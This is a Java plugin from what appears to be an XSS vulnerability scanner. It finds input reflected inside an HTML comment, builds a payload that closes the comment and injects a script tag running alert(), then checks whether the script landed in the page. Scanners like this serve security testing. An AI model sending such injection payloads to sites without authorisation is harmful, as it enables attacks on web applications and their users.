package com.vulnit.projects.xss.plugins;

import org.jsoup.nodes.Comment;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
import org.jsoup.select.Elements;

/**
 * Plugin to handle html comments &lt;!-- injected_value --&gt;
 * 
 * @author rmillet
 * 
 */
public final class HtmlCommentPlugin extends Plugin {
	private String scriptText;

	@Override
	public String getInitialPayload(Elements elements, String searchText) {
		for (Element element : elements) {
			for (Node node : element.childNodes()) {
				if (node instanceof Comment && ((Comment) node).getData().contains(searchText)) {
					this.scriptText = "alert('" + Plugin.Tag + "')";
					return "--><script>" + this.scriptText + "</script>";
				}
			}
		}
		return null;
	}

	@Override
	public String getPayload() {
		return null;
	}

	@Override
	public boolean isInjectionSuccessful(Document document) {
		Elements elements = document.select("script");
		for (Element element : elements) {
			if (element.data().contains(scriptText)) {
				return true;
			}
		}
		return false;
	}

}
